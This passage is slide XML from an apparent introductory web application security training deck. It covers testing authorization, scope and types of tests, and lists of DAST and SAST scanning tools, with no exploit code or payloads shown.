            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scope / Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methodology </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reporting </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="543453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pPr marL="457200" lvl="1" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Authorization</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1379200" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Permission from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hosting environments </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> party like AWS, Azure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note you may need to get permission from the platform you are testing from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Pentest Cloud Provider</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2000653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Authorization</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1379200" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Legal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Non-disclosure agreement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Rob Fuller Talk – Open Source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Pentesing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BCC35F3-5179-43C7-A875-B6CB7FB1D11A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6839628" y="3106993"/>
            <a:ext cx="4345188" cy="3420194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365ADD13-68C8-41B4-A4BE-71225AB29549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1858296" y="2793213"/>
            <a:ext cx="3013091" cy="3828811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1285058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Scope – Type of tests</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5181599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Black Box – little to no information about the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>White Box – Vulnerability oriented testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source Code reviews</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configuration audits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Grey Box – Black box techniques with greater visibility and access to the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161684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5181599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Red Team vs. Internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated vs. Manual Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated Scanning tools allowed ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time allotted for engagement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IP’s, URLs, Domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2839832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924E-A7D4-4AA7-995E-B57BD83894D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated Scanners - DAST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B32B95ED-3AD5-43D5-86A9-0EF10F438091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebInspect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burp Pro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IBM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AppScan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ZAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Qualys WAS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trustwave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NetSparker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74AA01C7-62DC-49A7-BFFC-E2155E548868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5610843" y="1045600"/>
            <a:ext cx="2523809" cy="752381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F51E41CB-332A-420F-9140-A62D0AB4B333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8134652" y="1797981"/>
            <a:ext cx="3761905" cy="1361905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{145E50F1-F563-48EF-A1B3-9952B4B0B95F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4658462" y="2212267"/>
            <a:ext cx="1904762" cy="1895238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C110AC4-026C-4787-BADC-6025C14A5A92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7396585" y="3696694"/>
            <a:ext cx="4057143" cy="1180952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2325AD19-F556-4326-951E-6C371FE5150B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5496343" y="5414454"/>
            <a:ext cx="3342857" cy="1104762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82943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1443-46C5-4643-88BA-0440FE77863B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static code analyzers - SAST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F4B834-219D-4C81-A8D7-A27407F9B17A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>List of tools for static code analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41967626-0A36-4F50-B882-DB02219303CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2781381"/>
            <a:ext cx="1466667" cy="1295238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD958E77-9390-4AFC-AA34-43EF99372607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4981608"/>
            <a:ext cx="2476190" cy="552381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC0E52C5-1ACA-4D45-8E5B-FF97891E4EA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4938857" y="3209952"/>
            <a:ext cx="2314286" cy="438095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8714C0B-FC96-4C12-A988-EAA5EEDBC7CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8569994" y="2591131"/>
            <a:ext cx="2657143" cy="2666667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95A48713-0DAA-4AD0-8332-440F9A2C5E6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743619" y="4581608"/>
            <a:ext cx="2590476" cy="800000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06B73C30-9AC1-41E2-9A79-4E31C8012924}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4211273"/>
            <a:ext cx="1537982" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eclipse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1773252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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Today’s Goal / Agenda</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452284" y="1494503"/>
            <a:ext cx="10595127" cy="5177246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part II</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Everything you need to get started in Web App Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part III</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site Scripting - XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>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20437980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Environment - Access</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5181599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
